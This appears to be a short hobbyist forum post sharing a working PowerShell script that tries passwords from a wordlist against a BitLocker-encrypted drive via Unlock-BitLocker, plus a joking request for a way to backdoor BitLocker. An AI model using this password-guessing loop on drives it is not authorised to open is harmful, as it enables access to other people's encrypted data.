
Bruteforcing BitLocker through PowerShell


icarus255


Wrote this little password brute forcing script in PowerShell while trying to decrypt a bitlocked HDD. There are some brute forcers already available that will actually test the extracted crypto values from the HDD but they are slow and cumbersome. I wanted to see if brute forcing straight through Windows would be any quicker and as expected... no 😞

The code basically takes input from a text file, converts it to a "SecureString" (needed or PS has a panic attack) and then tries to decrypt the HDD. At 0.5 guesses/second, I wouldn't worry about any large word lists but it works 🙂

This was just for a bit of fun but if you know of a way to speed up the script or make it more efficient please let me know as I wrote this really to get more familiar with PS. Better yet, if you know of a way to backdoor the BitLocker encryption that would be much appreciated 😉


# Need to run the script as powershell admin
# Define StreamReader and point it to your passwords list
$PWSstreamreader = New-Object System.IO.StreamReader("C:\temp\passwords.txt")
$linenumber = 1
#feeds line by line the candidates in passwords.txt
while ($null -ne ($readeachline = $PWSstreamreader.ReadLine()))
{
    Write-Host "$linenumber  $readeachline"
    # Need to convert our plaintext to SecureString for powershell to try and unlock. I guess this is some sort of security feature so people don't have plaintext passes lying around
    $SecureString = ConvertTo-SecureString "$readeachline" -AsPlainText -Force
    # Tries to unlock with converted SecureString.
    Unlock-BitLocker -MountPoint "D:" -Password $SecureString
    $info = Get-BitlockerVolume -MountPoint "D:"
    $linenumber++
    # Tests for decryption. Encrypted HDDs will always have a capacity of "0" so loops until capacity > 0 i.e. decrypted.
    If ($info.CapacityGB -ne "0") {Break}
}
$PWSstreamreader.Dispose()

 
